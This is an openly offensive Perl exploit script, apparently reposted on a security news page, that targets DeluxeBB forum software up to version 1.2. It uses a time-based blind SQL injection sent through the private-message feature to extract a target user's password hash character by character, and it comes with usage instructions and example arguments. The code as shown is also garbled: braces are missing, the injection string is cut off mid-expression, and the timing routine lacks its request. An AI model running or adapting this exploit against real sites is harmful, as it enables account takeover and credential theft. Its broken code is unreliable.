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DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit
来源:staker[at]hotmail[dot]it 作者:athos 发布时间:2008-12-29  
# --------------------------------------------------
# DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit
# --------------------------------------------------
# by athos - staker[at]hotmail[dot]it
# download on http://deluxebb.com
# --------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix id password target id
# perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1
# --------------------------------------------------
# Note: magic_quotes_gpc off
#       don't add me on msn messenger
#       my email staker.38@gmail.com
# --------------------------------------------------
# Greetz: str0ke,The:Paradox and #cancer
# --------------------------------------------------

use strict;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

my ($hash,$http);
my ($host,$prefix,$user,$pass,$target) = @ARGV;

$http = new LWP::UserAgent(timeout => 5);

if (@ARGV != 5)
      print "\n+----------------------------------------------------+\r",
            "\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r",
            "\nby athos - staker[at]hotmail[dot]it\n",
            "\nUsage     + perl $0 [host/path] [prefix] [ID] [password] [target ID]",
            "\nHost      + localhost/DeluxeBB",
            "\nID        + your user ID",
            "\nPassword  + your password",
            "\nPrefix    + table prefix (default: deluxebb)",
            "\nTarget ID + target id\n";

$http->default_header('Cookie' => cookies($user,$pass));


sub getUsername
      my ($user_id,$response,@nickname) = $_[0];

      $response = $http->get("http://$host/misc.php?sub=profile&uid=$user_id");
      @nickname = $response->as_string =~ m{<span class="misctext">(.+?)</span>}ig;
      return $nickname[1];

sub cookies
      my ($username);
      my ($user_id,$password) = @_;
      $username = getUsername($user_id);
      $password = md5_hex($password);
      return qq{membercookie=$username; memberid=$user_id; memberpw=$password;};
sub getMsg
      my $response = $http->get("http://$host/pm.php?sub=folder&name=inbox");
      if ($response->as_string =~ m/pid=(\d+)./i)
            return $1;
            my $content = {
                 to       => getUsername($user),
                 subject  => rand(999),
                 posticon => 'none',
                 rte1     => rand(999),
                 submit   => 'Send'

            my $request = $http->post("http://$host/pm.php?sub=newpm",$content);
            my $read_id = $http->get("http://$host/pm.php?sub=folder&name=inbox");
            if ($read_id->content =~ /pid=(\d+)./i)
                  return $1;

sub sql
      my ($i,$j,$sql) = (shift,shift,undef);
      $sql = "%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),".
             "+WHERE uid=$target))%23";
      return $sql;       

sub delay
      my ($tm1,$tm2) = (undef,undef);
      my ($msg,$sql) = @_;
      $tm1 = time();

      $tm2 = time();
      return $tm2 - $tm1;
sub exploit
      my ($i,$ord) = (1,undef);
      my @chr = (48..57, 97..102);
      for ($i..32)
            foreach $ord(@chr)
                  if (delay(&getMsg,&sql($i,$ord)) >= 5)
                        syswrite(STDOUT,chr($ord)); $hash .= chr($ord);
                  if ($i == 2 and not defined $hash)
                        syswrite(STDOUT,"Exploit Failed!\n");

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